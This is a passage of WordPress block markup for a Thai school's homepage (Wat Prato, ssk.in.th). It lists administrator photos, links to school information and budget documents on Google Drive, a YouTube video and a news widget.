{\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" 